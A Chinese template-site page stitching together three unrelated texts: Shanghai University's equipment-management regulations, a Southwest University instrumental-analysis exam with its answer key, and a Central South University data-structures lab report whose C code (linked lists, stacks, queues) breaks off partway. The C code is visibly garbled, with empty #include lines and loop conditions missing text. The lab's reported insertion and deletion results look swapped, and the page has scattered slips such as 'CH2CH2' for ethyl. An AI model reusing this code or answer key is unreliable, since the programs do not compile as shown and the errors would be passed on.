人人范文网 其他范文

大学实验报告仪器范文(精选多篇)

发布时间:2022-12-12 06:08:59 来源:其他范文 收藏本文 下载本文 手机版

推荐第1篇:上海大学仪器设备管理细则

上海大学仪器设备管理细则

一、总

第一条 为适应教育事业的改革与发展,贯彻国家教育部教高[2000]9号文“关于印发《高等学校仪器设备管理办法》的通知”精神,加强对学校仪器设备的科学管理,提高仪器设备的完好率和使用率,防止公物私化,保证学校的教学、科研、生产和行政等方面工作的顺利进行,特制订本细则。

第二条 学校的仪器设备是国家财产,全校师生员工都要自觉爱护,杜绝铺张浪费和损坏公共财产的不良行为,要加强对仪器设备管理工作的领导,健全机构,专人负责。各级领导应重视仪器设备工作人员队伍的建设,经常对管理人员进行政治思想教育和业务培训,经常检查设备管理工作,不断提高管理水平。

二、管理机构及其职责

第三条 为加强学校仪器设备的归口管理,学校由一位副校长主管全校设备工作。根据“统一领导,分口管理”的原则,由实验设备处负责全校仪器仪表、机电设备、电子设备、印刷机械、卫生医疗器械、文体设备、标本模型、文物及陈列品、工具、量具和器具、行政办公设备等十大类物资的管理工作,并负有审批、监督、检查、调拨、分配、管理的职责。

1.我校仪器设备实行校、院(系)二级管理,各院(系)应由一位副院长(副系主任)主管设备工作,并设专职院长(系主任)助理或者院长(系主任)秘书,协助管理设备工作。各院(系)实验室为学校仪器设备管理的基层单位。

2.各类经费购置或接受捐赠等仪器设备的产权属上海大学,均应按学校正式建制单位办理入账手续。

三、范

第四条 凡符合下列条件为学校专用仪器设备

1.单价800元人民币(含800元人民币)以上,耐用时间在一年以上,非易损,能独立使用的教学、科研、生产、行政用仪器设备,以及2000元人民币以上的各种软件。

2.需移交给委托单位的实验室小批量试制产品和科研样机所需配置的外购设备,均应凭合同任务书(复印件)到实验设备处办理审核手续后报销。

3.自制或国内外(境外)捐赠、校外调拨的仪器、设备及各种计算机软件,凡符合上述规定的,都应办理固定资产入账或转账手续。

第五条 仪器设备的资产值

1.因技术改造扩充新的功能而增加其价值时,按所开支的材料、工费增加原值。

2.有的设备不配套,后购置的原缺附件,按实价增加其原值。

3.原有的设备,因毁、损、拆除其原有部份时,应减少其原值。

第六条 各院(系)由一位副院长(副系主任)主管设备管理工作。

各使用单位必须选派思想作风好、工作认真负责的在职人员任专职或兼职管理员,在业务上受实验设备处的指导。管理员的职责是负责财产的保管、监督、检查、建帐和建档,办理借用、调拨、报废等手续。凡教学、科研系统仪器设备管理的基层管理员,需报实验设备处登记备案。管理人员要相对稳定,不要随意调换。如工作需要调动时,须事先报实验设备处备案,办理移交手续。

四、管

第七条 仪器设备购置

1.实验室根据建设规划和实验教学的需要,制定出下年度的教学仪器设备申购计划,经主管院(系)领导审批后,报送实验设备处汇总。实验设备处根据经费分配情况及申购的合理性进行预审,报主管校长审核后,办理申购手续。

2.实验室申购单价在10万人民币以上(含10万元人民币)的仪器设备(20万元人民币以上计算机):或者有一定批量,总、价值超过30万元人民币;或者单价较小、集成为一个系统超过30万元人民币的仪器设备,购买前必须填写《大型精密贵重仪器设备可行性论证报告》。 单价10万元以上(含10万元人民币)的仪器设备由实验设备处及各院(系)共同组织专家论证,要求由两位校外专家,一位校内专家组成专家组,论证报告及审购单交实验设备处审核报校长审定备案。

3.申购仪器时应该详细填写仪器设备的性能、规格、型号及使用条件等。

4.凡教学需要自制设备、装制,一律事先以书面报告报实验设备处批准,在自制完成后应验收、入帐。

5.所有仪器设备一律通过实验设备处认可才能报销入帐。第八条 仪器设备的验收

1.常规验收:仪器设备到校后,由申购单位组织专人或验收小组对发票、说明书、装箱单及其他技术资料等进行校验,检查是否符合合同要求。经验收合格后逐项填写《上海大学进口及国内精密贵重仪器设备开箱记录》

2.技术验收:对购入的精密、贵重、稀缺仪器和大型设备,特别是进口仪器设备,由申购单位组织验收小组、或者组织有关专家和使用单位联合验收,逐条考核该设备的技术指标和功能等,并填写《上海大学进口及国内精密贵重仪器设备质量验收记录》列出验收技术指标签名后存档。上述验收中,如发现损坏或短缺情况,应立即根据有关规定,由采购部门向供货(运输)单位提出。办理退、换、赔等手续。精密、贵重、稀缺、进口仪器设备如达不到订货合同技术指标,

应由采购部门向商检局提出商检,开具商检证明,向供货单位索赔。未经商检不得动用。

第九条 为加强对仪器设备的管理和核算,必须建立必要的帐册,进行登记、核算、管理、清点等。根据财务、财产管理、财产使用三级设置固定资产帐。

1.财务部门设置固定资产基金总帐户(资金来源),同时设置固定资产总帐户(资金结存类),并按规定设置明细帐。

2.实验设备处设置与财务部门及使用部门相对应的收支日记帐、分户帐、分类帐。

3.财产使用部门设立固定资产分YF帐,并注明存放地点及使用单位。财务、财务管理、财产使用三方面要定期检查核对,做到帐帐相符,帐物相符。

4.实验设备处每年将当年入库的设备帐报财务处核对,财务处也应将当年报销的设备帐报实验设备处核对,确保帐帐相符。

5.凡属上海大学所有的仪器设备均应以实验设备处的“上海大学设备固定资产帐册”上的台(件)数、金额数为准。

6.使用单位均应到实验设备处填写“上海大学固定资产(教学科研设备)

验收入库单”,以下简称(设备固定资产验收入库单)经审核盖章后,财务处方可报销。

第十条 各使用单位领导要切实加强对仪器设备的管理工作。仪器设备要做到充分利用,坚持和健全各项规章制度,以保证教学、科研、技术开发、生产和行政工作的顺利进行。

第十一条 不得任意拆改仪器设备。因教学、科研、生产需要特殊改装的,由使用单位提出具体拆改方案,经主管院(系)领导签署意见,报实验设备处审批同意后,方可拆改;精密贵重仪器及大型设备需经实验设备处审核,并报主管校长批准。改装后的仪器设备要重新验收入账。 对未经批准擅自拆改而造成损失者,要追究当事者的责任,赔偿损失。

第十二条 仪器设备的借用和仪器设备出借要严格执行审批和登记手续。

1.校内各单位借用仪器设备,须经实验室主任签字批准后,管理员办理出借手续。所借仪器设备应爱护使用,借用期一般不超过三个月。若有损坏,应负责修复或赔偿。

2.外单位向我校借用仪器设备,必须在不影响本单位正常工作的前提下,方能同意,借用期限一般不超过三个月。精密贵重仪器及大型设备一般不得外借,特殊情况必须经实验设备处审核,报请主管校长批准。

1) 校外单位洽借仪器设备,必须携带单位正式介绍信,经使用单位和所在院(系)主管负责人同意批准,报实验设备处备案,方可办理借用协议书,并收取一定费用。

2) 对未经批准,擅自向校外单位出借仪器设备,学校应追究当事者责任,并且每天按仪器设备原价的2~5%收取罚款。

3) 仪器设备一律不得出借给私人使用。本校教师职工因工作需要借用,须经实验室主任签字批准。本科生和研究生需要借用,须经导师签字同意,办理借用手续,并按时归还。归还时,管理员应认真检查。如发现损坏,遗失,应予赔偿。

4) 因工作调动、或离退休的教职工,毕业分配的学生离开本部门前,应归还借物。经实验室主任签字认可后,人事部门方可办理离岗或离校手续。出国学习人员也必须按上述原则进行。

5) 所有仪器设备不得私自带出校外。如因工作需要必须带出者,需按规定经实验室主任批准,并办理出门证手续后,方准带出。

五、处

第十三条 校内仪器设备调动时,由调动单位管理员填写《上海大学固定资产内部调拨单》,经调出和调入双方实验室主任同意、签字、盖实验室章,报实验设备处,经实验设备处审批、盖章认可后,方可调动。

仪器设备向校外调拨,须按下列原则进行:

1.调拨仪器设备必须确认是我校闲置多余,已不适用教学科研需要的仪器随便设备。调拨单位必须持正式介绍信,向院(系)和实验设备处洽谈协商,经三方同意后,办理《上海大学物资设备调拨单》并经对方单位签章认可后,方可调拨。

2.外调仪器一律实行有价转让。转让价格视该仪器设备使用、折旧等综合情况确定。学校投资设备转让所得款项应全额归学校。

3.单价1万元人民币以下的仪器设备外调,由院(系实验设备处处长审批;10以上人民币的仪器设备外调,须经主管校长审批。

第十四条 仪器设备的报废

1. 仪器设备符号下列情况之一时,可申请报废:

1) 达到或超过使用期限,主要部件或结构已经损坏、不能达到最低使用要求,且无修复价值者;

2) 不能迁移的设备,因实验用房改建或工艺布置改变必须拆毁者;

3) 因意外灾害或突然事故,受到严重损坏、无修复价值者;

4) 修复费用超过或接近新购价值者;

5) 凡上级主管部门有文件规定淘汰或不准再用的产品。

2.需要报废的仪器设备,由实验室填写《设备固定资产报废单》或《大型设备报废审判》,经实验室主任、及主管院长审核后,送实验设备处审定,经技术鉴定及主管校长审批,由实验设备处备案、销帐。

3.单价10万元人民币以下仪器设备报废,由实验设备处备案销帐,单价10万元人民币以上的仪器设备报废,由实验设备处处长审批;单价50万元人民币

以上的仪器设备报废,须经主管校长审批;单价100万万元人民币以上的仪器设备报废,报教委审批;单价5万元人民币以下,一次总价值在100万元日内、人民币以下仪器设备报废,由校长审批。

第十五条 经批准报废的仪器设备,原则上不作留用,使用部门需要留作教具或拆卸零件维修,须经实验设备处批准,并注明报废留用标志,其残植列入低值品帐中,以利备查。

第十六条 仪器设备的损坏、丢失、和赔偿对责任事故造成仪器设备损坏和丢失者均应赔偿,其中失窃者须上报校保卫处备案,并给予适当的批评教育;严重失职,发生重大事故又隐瞒不报者,除责令赔偿外,应根据具体情节给予适当的行政处分。

推荐第2篇:西南大学1175《仪器分析》

1、可用来检测红外光的原件是

1.2.3.4.热电偶 硅二极管 光电倍增管 光电管

2、空心阴极灯内充的气体是

1.2.3.4.C.少量的氖或氩等惰性气体 大量的氖或氩等惰性气体 少量的空气 大量的空气

3、某化合物受电磁辐射作用后,振动能级发生变化,所产生的光谱波长范围是

1.2.3.4.紫外光 红外光 可见光 X射线

4、质谱图中强度最大的峰,规定其相对丰度为100%,这种峰称为

1.2.3.4.E.准分子离子峰 基峰

分子离子峰 亚稳离子峰

5、分子的紫外可见吸收光谱呈带状光谱,其原因是

1.2.3.4.F.分子振动能级的跃迁伴随着转动能级的跃迁 分子中价电子运动的离域性质

分子中电子能级的跃迁伴随着振动,转动能级的跃迁 分子中价电子能级的相互作用

6、在化合物CH3CH2CH2Cl中,质子存在的类型共为

1.2.3.4.二类 无法判断 三类 四类

7、色谱流出曲线中,两峰间距离决定于相应两组分在两相间的 1.2.3.4.理论塔板数 扩散速度 传质阻抗 分配系数

8、某一含氧化合物的红外吸收光谱中,在3300~2500cm-1处有一个宽,强的吸收峰,下列物质中最可能的是

1.2.3.4.CH3COCH3 CH3CH2CH2OH CH3CH2CHO CH3CH2COOH

9、原子吸收光谱产生的原因是

1.2.3.4.振动能级跃迁 原子最外层电子跃迁 分子中电子能级跃迁 转动能级跃迁

10、下述那个性质可以说明电磁辐射的微粒性

1.2.3.4.能量 波数 频率 波长

11、高效液相色谱中,属于通用型检测器的是

1.2.3.4.紫外检测器 荧光检测器 电导检测器 示差折光检测器

12、下列四种化合物中,在紫外区出现两个吸收带的是

1.2.3.4.A.1,5-己二烯 B.乙醛 2-丁烯醛 乙烯

13、在气相色谱中,色谱柱的使用上限温度取决于 1.2.3.4.固定液的最高使用温度

样品中各组分沸点的平均值 样品中沸点最高组分的温度 固定液的沸点

14、下列不适宜用核磁共振测定的核种是

1.2.3.4.12C 15N 31P 19F

15、利用组分在离子交换剂(固定相)上亲和力不同而达到分离的色谱分析法为

1.2.3.4.分配色谱法 分子排阻色谱法 吸附色谱法 离子交换色谱法

16、在核磁共振中,若外加磁场的强度H0逐渐加大,则使原子核自旋能级的低能态跃迁到高能态所需的能量是

1.2.3.4.随原核而变 不变 逐渐变大 逐渐变小

17、最适于五味子中挥发油成分定性分析的方法是

1.2.3.4.D.TLC LC-MS CE-MS GC-MS

18、某化合物在质谱图上出现m/z 29,43,57等离子峰,IR图在1380,1460和1720cm-1位置出现吸收峰,则该化合物可能为

1.2.3.4.烷烃 醛 醛或酮 酮

19、若原子吸收的定量方法为标准加入法时,消除的干扰是 1.2.3.4.基体干扰 光散射 分子吸收 背景吸收

20、在以硅胶为固定相的薄层色谱中,若用某种有机溶剂为流动相,则在展开过程中迁移速度慢的组分是

1.2.3.4.极性大的组分 极性小的组分 挥发性大的组分 挥发性小的组分

21、保留时间

参考答案:

保留时间:组分从进样开始到色谱柱后出现浓度极大值时所需要的时间。

22、分离度

参考答案:

相邻两组分色谱峰的保留时间之差与两色谱峰平均峰宽的比值,即峰间距比平均峰宽

23、蓝移

参考答案:

由于结构或实验条件的变化,是吸收峰向短波长方向移动的现象,称为蓝移

24、纸色谱法

参考答案:

纸色谱法是以滤纸作为载体,以吸着在纸纤维上的水或其他物质做固定液,以有机溶剂为展开

剂,根据被分离物质在两相中分配系数不同而实现分离的色谱分析法。

25、检测限

参考答案:

一般以检测器恰能产生2倍(或3倍)噪音信号时,单位时间内载气引入检测器的组分量

或单位体积载气中所含的组分量

26、红移

参考答案:

由于结构或实验条件的变化,是吸收峰向长波长方向移动的现象,称为红移

27、化学键合相

参考答案:

是用化学反应的方法将固定液的官能团键合在载体表面上而形成的固定相

28、吸收光谱(吸收曲线)

参考答案:

吸收光谱(吸收曲线):以吸光度为纵坐标,波长为横坐标所得的吸光度-波长曲

线即为吸收光谱曲线,又称为吸收曲线。

29、梯度洗脱

参考答案:

在一个分析周期内,按照一定程序不断改变流动相的组成或浓度配比,成为梯度洗脱。

30、分配系数

参考答案:

在一定温度和压力下,达到分配平衡时,组分在固定相和流动相中平衡浓度的比值

31、色谱流出曲线

参考答案:

经色谱柱分离的组分依次流出色谱柱进入检测器,检测器的响应信号对时间或流动相体积作图

得到的曲线称为色谱流出曲线,又称为色谱图

32、红移和蓝移

参考答案:

红移:由于结构或实验条件的变化,使吸收峰向长波长方向移动的现象,也称长移; 蓝移:由于结构或实验条件的变化,使吸收峰向短波长方向移动的现象,也称紫移

33、离子交换色谱法

参考答案:

利用被分离组分对离子交换剂离子交换能力(或选择性系数)的差别而实现分离的色谱分

析方法,主要用于离子型化合物的分离分析

34、灵敏度

参考答案:

又称响应值或应答值,为响应信号变化与通过检测器物质量变化之比

35、荧光效率

参考答案:

荧光效率:又称荧光量子产率,指物质发射荧光的量子数与所吸收的激发光量

子数的比值,常用Ψf表示

36、吸收光谱

参考答案:

吸收光谱:物质吸收相应的辐射能而产生的光谱

37、助色团

参考答案:

有机化合物结构中杂原子的饱和基团,与生色团或饱和烃相连时,使相连生色团或饱和烃的紫

外吸收向长波长方向移动或产生紫外吸收,并使吸收强度增加的基团

38、发射光谱

参考答案:

发射光谱:构成物质的原子,离子或分子受到辐射能,热能,电能或化学能的激发,跃迁到激发态,由激发态回到基态或较低能态时以辐射的方式释放能量而产生的光谱

39、薄层色谱法

参考答案:

将固定相均匀涂布于洁净的玻璃板,铝箔或塑料片上形成一均匀的薄层,将试样溶液和对照溶液点于薄层板的一端,在密闭的容器(展开缸)中用适当的溶剂展开,而进行分离分 析的方法。 40、保留体积

参考答案:

组分从进样开始到色谱柱后出现浓度极大值所通过的流动相体积

41、电磁波谱

参考答案:

电磁波谱:电磁波按照其波长或频率的顺序排列成谱,称为电磁波谱

42、荧光光谱

参考答案:

荧光光谱:气态金属原子核物质分子受电磁辐射(一次辐射)激发后,能以发射辐射的形式(二次辐射)释放能量返回基态,这种二次辐射称为荧光或磷 光,以荧光或磷光强度对波长作图既得荧光光谱。

43、为什么双聚焦质谱仪能提高仪器的分辨率?

参考答案:

答:因磁分析器主要具有方向聚焦和质量色散作用,虽然也具有能量色散作用,但却不能消除同一质荷比的离子具有不同动能对分辨率的影响,如在磁分析器之前添加一静电分析

器构成双聚焦质量分析器,由于静电分析器具有能量色散和方向聚焦作用,消除了同一质荷比的离子动能分散对分辨率的影响,就可大大提高仪器的分辨率

44、试简述紫外-可见分光光度计的主要部件。

参考答案:

答:紫外可见分光光度计的基本结构是由五个部分组成:即光源,单色器,吸收池,检测器和信号指示系统

45、在核磁共振中,化学位移是如何产生的?

参考答案:

答:处于外磁场中的原子核,由于核外电子及其他因素的影响产生感应磁场,则实受场强为两者的加和。根据Larmor公式的修正式ν=γ/2π(1-σ)H0可知,所处不同化学环境的同 种核,由于进动频率不同,化学位移值不同。

46、质谱仪的性能指标有哪些?

参考答案:

答:质谱仪的性能指标主要有质量范围,质量精度,分辨率与灵敏度等。

47、哪些核种具有核磁共振现象

参考答案:

答:自旋量子数I≠0的原子核具有核磁共振现象。

48、试简述紫外吸收光谱定性鉴别的依据

参考答案:

答:利用紫外吸收光谱的形状,吸收峰的数目,各吸收峰的波长位置和相应的吸光系数等可对

部分有机化合物进行定性鉴别

49、什么是色谱法?色谱法分离的原理是什么?

参考答案:

答:色谱法是一种物理或物理化学分离分析方法,与蒸馏,重结晶,溶剂萃取及沉淀法一样,也是一种分离技术。(5分)其原理是利用各组分在固定相,流动相两相中分配系数的不同,在两相中进行反复的吸附和分配等,使差距积累实现差速迁移达到分离的目的。(5分)

50、某化合物A在薄层板上从原点迁移5.1cm,溶剂前沿距原点12.2cm 1.计算化合物A的Rf值;

2.在相同的薄层系统中,若溶剂前沿距原点展距为15cm,则化合物A 的斑点在此薄层板上距原点多远。

参考答案:

解:Rf=L/L0=5.1/12.2=0.42 L’=L0*Rf=15*0.42=6.3

51、在一色谱柱上,组分A流出需要15分钟,组分B流出需要25分钟,不被固定相滞留的组分C流出需要2.0分钟。求: 1.A相对于B的相对保留值

2.A通过流动相的时间占其流出总时间的百分率;3.B通过固定相的平均时间

参考答案:

解:(1)A相对于B的相对保留值=t’R(A)/t’R(B)=(15-2)/(25-2)=0.57 (2)A通过流动相的时间占其流出总时间的百分率 =t0/tR(a)=2.0/15*100%=13.3% (3) B通过固定相的平均时间=25.0-2.0=23min

52、具有何种结构的化合物能产生紫外吸收光谱?

参考答案:

含有π-π*,n-π*官能团结构的有机化合物能够产生紫外吸收光谱;紫外光谱是电子光谱,表现

特征是带状光谱

53、红外光谱中造成吸收峰数目少于基本振动数目的原因是什么?

参考答案:

红外光谱中造成吸收峰数目少于基本振动数目的原因是(1)简并; (2)红外非活性振动。

54、原子吸收分析中,若采用火焰原子化法,是否火焰温度越高,测定灵敏度就越高?为什么

参考答案:

不是。因为随着火焰温度的升高,激发态原子增加,电离度增大,基态原子减少。所以如果火焰温度太高,反而可能会导致测定灵敏度降低。尤其是对于易挥发和电离电位较低的元素,应 使用低温火焰。

55、色谱分析中常用的定性分析方法有哪些

参考答案:

色谱分析中常用的定性分析方法有利用保留值定性(包括对照品对照法,利用文献数据-相对保留值或保留指数定性,加入对照品峰高增加法定性等),利用选择性检测相应定性,两谱连 用定性(GC-MS, GC-FTIR, LC-MS, LC-NMR, LC-FTIR)

56、红外光谱中,C-H和C-Cl键的伸缩振动峰何者强,为什么?

参考答案:

C-Cl键的伸缩振动峰强,因Cl的电负性比氢强,导致C-Cl键的偶极矩比C-H键的偶极矩大,

因此C-Cl键的伸缩振动峰强。

57、质谱仪为什么需要高真空条件

参考答案:

质谱仪中的进样系统,离子源,质量分析器与检测器都必须处于高真空状态,否则会造成离子

源灯丝损坏,副反应过多,本底增高,图谱复杂化等一系列问题。

58、简述吸附色谱,分配色谱,离子交换色谱,分子排阻色谱的分离原理

参考答案:

吸附色谱法是利用被分离组分对固定相表面吸附中心吸附能力的差别,即吸附系数的差别而实现分离的(5分);分配色谱法是利用被分离组分在固定相或流动相中溶解度的差别,即在两相间分配系数的差别而实现分离(5分);离子交换色谱利用被分离组分对离子交换树脂离子 交换能力的差别,或选择性系数的差别而实现分离(5分);分子排阻色谱法是根据被分离组分分子的线团尺寸,或对凝胶孔穴渗透系数的差别而实现分离(5分)。

59、在邻苯二酚的1H NMR谱中,除了活泼氢信号外,会出现几组共振信号?各自裂分为几重峰?峰高比为多少?

参考答案:

在邻苯二酚中除了2个酚羟基质子之外,剩余的4个芳香质子构成了AA’BB’自旋偶合系统,其中核磁共振氢谱中会出现两组共振信号,(5分),各自裂分为二重峰(5分),各小峰峰

高比约为1:1(5分)。

60、原子吸收分析中,若采用火焰原子化法,是否火焰温度越高,测定灵敏度就越高?为什么

参考答案:

不是。因为随着火焰温度的升高,激发态原子增加,电离度增大,基态原子减少。所以如果火焰温度太高,反而可能会导致测定灵敏度降低。尤其是对于易挥发和电离电位较低的元素,应 使用低温火焰。

61、乙苯的1H-NMR谱中共有几组共振信号,试描述它们的化学位移值,氢分布及峰形

参考答案:

乙苯中-CH2CH2基团构成A2X3自旋体系,CH2质子化学位移值约为2.6,裂分为四重峰,各小峰强度比为1:3:3:1,氢分布为2;CH3质子化学位移值约为1.2,裂分为三重峰,各小峰峰

强比为:1:2:1,氢分布为3;由于取代基为乙基,苯环上5个芳香质子所处化学环境基本相同,在低分辨率仪器测定时,呈现单峰,在高分辨率仪器测定时,呈现多重峰,氢分布为5.6

2、请简述吸附色谱的基本原理。

参考答案:

当色谱条件一定时,不同的组分拥有不同的K值。K值小说明该组分被固定相吸附得不牢,易被流动相解吸附,在固定相中滞留时间短,移动速度快,先流出色谱柱;若K值大,说明该

物质被吸附得牢固,在固定相中滞留时间长,移动速率慢,后流出色谱柱。要使混合物中各组分实现相互分离,它们得K值相差应该足够大,K值差距越大,这种分离越容易。

63、高效液相色谱中提高柱效的途径有哪些?其中最有效的途径是什么?

参考答案:

高效液相色谱中提高柱效的途径主要有:1)提高柱内填料装填的均匀性;2)采用小粒度固定

相;3)选用低粘度的流动相;4)适当提高柱温 。其中减小粒度是最有效的途径

推荐第3篇:中南大学 数据结构实验报告

数据结构实验报告

专业班级: 指导老师:余腊生 姓

名: 学

号: 实验一 单链表的基本操作的实现

一、实验目的

掌握单链表的基本操作:建立、插入、删除、查找等运算。

二、实验仪器

安装VC++的PC机。

三、实验原理

利用线性表的特性以及其链式存储结构特点对线性表进行相关操作。

四、实验内容

程序中演示了单链表的创建、插入、删除和查找。 程序如下:

#include #include #include #include typedef struct node { int data; struct node *next; } NODE; /******************************************/ NODE *Create() { NODE *p,*head; int x; head=(NODE *)malloc(sizeof(NODE)); head->next=NULL; printf(\"Input data,-1 to End!\\n\");

scanf(\"%d\",&x); while(x!=-1) { p=(NODE *)malloc(sizeof(NODE)); p->data=x; p->next=head->next; head->next=p; scanf(\"%d\",&x); } return(head); } /******************************************/ void Output(NODE *head) { NODE *p; p=head; printf(\"Begin to dump the LinkList...\\n\"); while(p->next!=NULL){ printf(\"->%d\",p->next->data); p=p->next; } printf(\"\\nThe LinkList ended!\\n\"); } /******************************************/ int Listlen(NODE *head){ int i=0; NODE *p=head; while(p->next!=NULL){ i++; p=p->next; } return(i); } /******************************************/ int Get(NODE *head,int i){ int j=0; NODE *p=head; while(p->next&&jnext; } if(!p->next||j>i) return(0); else return(p->data); } /******************************************/ void Del(NODE *head,int i){ NODE *p=head; int j=0; while(p->next&&jnext; } if(!p->next||j>i-1) printf(\"the position is wrong\\n\"); else p->next=p->next->next; } /******************************************/ void Ins(NODE *head,int i,int e) { NODE *p=head,*q; int j=0; while(p->next&&jnext; } if(!p->next&&j>i-1) printf(\"Wrong position\\n\" ); else { q=(NODE *)malloc(sizeof(NODE)); q->data=e; q->next=p->next; p->next=q; } } /******************************************/ main(){ NODE *head; int length; int i,element; system(\"CLS\"); head=Create(); Output(head); length=Listlen(head); printf(\"the length of the link is %d\\n\",length); printf(\"input the order :\\n\"); scanf(\"%d\",&i); element=Get(head,i); printf(\"the element of the order is %d\\n\",element); printf(\"input the del position \\n\"); scanf(\"%d\",&i); Del(head,i); Output(head); printf(\"Input the insert posion and element:\\n\"); scanf(\"%d%d\",&i,&element); Ins(head,i,element); Output(head); getch(); }

五、数据记录及处理

1、运行程序,输入下面一组数据: 93 94 12 13 20 14 链表顺序:14 20 13 12 94 93

2、删除第二个数据结点,在第一个位置插入数据20。

运行结果如下: 插入结果:14 13 12 94 93 删除结果:20 14 13 12 94 93 运行结果截图:

实验二 栈和队列的实现

一、目的和要求

1.理解队列和栈的顺序存储结构和链式存储结构。通过本实验,熟悉队列、栈的结构特点; 2.熟悉队列、栈结构上的操作与算法的实现。

二、实验内容

1.队列的基本操作和应用。2.栈的基本操作和应用。

三、仪器、设备和材料

1.适合实验要求的计算机系统 。 2.VC++编程平台。

四、实验原理

队列与栈是一种操作受限制的线性表,在了解线性表的基本原理的基础上,理解与完成此项实验。

五、实验步骤

1.采用队列的顺序存储结构,。

2.用菜单的形式完成队列的建立,出队,入队等基本操作。3.采用栈的链式存储结构。

4.用菜单的形式完成栈的出栈、入栈等基本操作。

六、程序算法

#include #include #define OVERFLOW -2 #define ERROR 0 #define OK 1 #define MAX 100 //栈的最大值 typedef int SElemType; typedef int QElemType; typedef struct {SElemType *base;

SElemType *top; }SqStack;

SqStack InitStacka( ) //顺序存储实现栈的初始化 {SqStack S; S.base=(SElemType *)malloc(MAX*sizeof(SElemType)); if(!S.base) exit(OVERFLOW); S.top=S.base; return(S); }

void Pusha(SqStack &S,int x) //顺序存储实现栈的入栈操作 {if(S.top-S.base>=MAX) exit(OVERFLOW); *S.top++=x; }

void Popa(SqStack &S) //顺序存储实现栈的出栈操作 {SElemType *p; int x; if(S.top==S.base) return ; else {p=S.top; x=*--S.top; printf(\"\\t删除的栈顶元素是%d\\n\\t出栈操作完成后的栈为:\\n\",x); } } void printa(SqStack S) //输出 {SElemType *p; p=S.base; printf(\"\\t\"); while(p!=S.top) {printf(\"%d \",*(p++));} printf(\"\\n\"); }

typedef struct SqNode {SElemType data; SqNode *Link; }*Sqptr,NODE; typedef struct {Sqptr top; }Stack;

Stack InitStackb() //链式存储实现栈的初始化 {Stack S; S.top=(Sqptr)malloc(sizeof(NODE)); if(!S.top) exit (OVERFLOW); S.top->Link=NULL; return(S); }

void Pushb(Stack &S,int x) //链式存储实现栈的入栈操作 {Sqptr p; p=(Sqptr)malloc(sizeof(NODE)); if(!p) return; p->data=x; p->Link=S.top->Link; S.top->Link=p; }

void Popb(Stack &S) //链式存储实现栈的出栈操作 {int x; Sqptr p; if(S.top->Link==NULL) return; else {p=S.top->Link;

x=p->data;

S.top->Link=p->Link;

printf(\"\\t删除的栈顶元素是%d\\n\",x);

free(p);} }

typedef struct QNode {QElemType data; struct QNode *next; }*QueuePtr,QNode; typedef struct {QueuePtr front; QueuePtr rear; }LinkQueue; LinkQueue InitQueue() //链式存储实现队列的初始化 {LinkQueue Q; Q.front=Q.rear=(QueuePtr)malloc(sizeof(QNode)); if(!Q.front) exit(OVERFLOW); Q.front->next=NULL;

return(Q); } void EnQueue(LinkQueue &Q,QElemType x) //链式存储实现队列的入队 {QueuePtr p; p=(QueuePtr)malloc(sizeof(QNode)); if(!p) exit(OVERFLOW); p->data=x; p->next=NULL; Q.rear->next=p; Q.rear=p; } void DeQueue(LinkQueue &Q) //链式存储实现队列的出队 {int x; if(Q.front==Q.rear) return; QueuePtr p; p=Q.front->next; x=p->data; printf(\"\\t删除的队头元素是:%d\\n\",x); Q.front->next=p->next; if(Q.rear==p) Q.rear=Q.front; free(p); return; }

typedef struct {SElemType *base; int front,rear; }SqQueue; SqQueue InitQueueb() //顺序存储实现队列的初始化 {SqQueue S; S.base=(SElemType *)malloc(MAX*sizeof(SElemType)); if(!S.base) exit(OVERFLOW); S.front=S.rear=0; return(S); } void EnQueueb(SqQueue &S,int x)

//顺序存储实现队列的入队 {if((S.rear+1)%MAX==S.front) return; S.base[S.rear]=x; S.rear=(S.rear+1)%MAX; } void DeQueueb(SqQueue &S) //顺序存储实现队列的出队 {int x; if(S.front==S.rear) return; x=S.base[S.front]; S.front=(S.front+1)%MAX; printf(\"\\t删除的队头元素是:%d\\n\",x); } void main() {int choice; int n,x; printf(\"\\n\\n\"); printf(\"\\t1.采用链式存储实现栈的初始化、入栈、出栈操作\\n\"); printf(\"\\t2.采用顺序存储实现栈的初始化、入栈、出栈操作\\n\"); printf(\"\\t3.采用链式存储实现队列的初始化、入队、出队操作\\n\"); printf(\"\\t4.采用顺序存储实现队列的初始化、入队、出队操作\\n\"); printf(\"\\t请选择:\"); scanf(\"%d\",&choice); switch(choice) {case 1:Stack Sa;

printf(\"\\t1.链式存储实现栈的初始化\\n\");

printf(\"\\t2.链式存储实现栈的入栈操作\\n\");

printf(\"\\t3.链式存储实现栈的出栈操作\\n\");

while(1){

printf(\"\\t请选择:\");

scanf(\"%d\",&n);

switch(n)

{case 1:Sa=InitStackb();

printf(\"\\t链式存储栈的初始化完成!\\n\");break;

case 2:printf(\"\\t以\'0\'结束\\n\");printf(\"\\t\");

scanf(\"%d\",&x);

while(x){

Pushb(Sa,x);scanf(\"%d\",&x);}

printf(\"\\t链式存储栈的入栈操作完成!\\n\");break;

case 3:Popb(Sa);break;}}break;

case 2:SqStack S;

printf(\"\\t1.顺序存储实现栈的初始化\\n\");

printf(\"\\t2.顺序存储实现栈的入栈操作\\n\");

printf(\"\\t3.顺序存储实现栈的出栈操作\\n\");

while(1){

printf(\"\\t请选择:\");

scanf(\"%d\",&n);

switch(n)

{ case 1:S=InitStacka();

printf(\"\\t顺序存储栈的初始化完成!\\n\");break;

case 2:printf(\"\\t以\'0\'结束\\n\");

printf(\"\\t\");

scanf(\"%d\",&x);

while(x){

Pusha(S,x);

scanf(\"%d\",&x);}

printf(\"\\t顺序存储栈的入栈操作完成!\\n\");

printa(S);break;

case 3:Popa(S);

printa(S);break;}}break;

case 3:LinkQueue Q;

printf(\"\\t1.链式存储实现队的初始化\\n\");

printf(\"\\t2.链式存储实现队的入栈操作\\n\");

printf(\"\\t3.链式存储实现队的出栈操作\\n\");

while(1){

printf(\"\\t请选择:\");

scanf(\"%d\",&n);

switch(n)

{

case 1:Q=InitQueue();

printf(\"\\t链式存储队的初始化完成!\\n\");break;

case 2:printf(\"\\t以\'0\'结束\\n\");printf(\"\\t\");scanf(\"%d\",&x);

while(x){

EnQueue(Q,x);scanf(\"%d\",&x);}

printf(\"\\t链式存储队的入栈操作完成!\\n\");break;

case 3:DeQueue(Q);break;}}break;

case 4:SqQueue Sv;

printf(\"\\t1.顺序存储实现队的初始化\\n\");

printf(\"\\t2.顺序存储实现队的入栈操作\\n\");

printf(\"\\t3.顺序存储实现队的出栈操作\\n\");

while(1){

printf(\"\\t请选择:\");

scanf(\"%d\",&n);

switch(n)

{case 1:Sv=InitQueueb();

printf(\"\\t链式存储栈的初始化完成!\\n\");break;

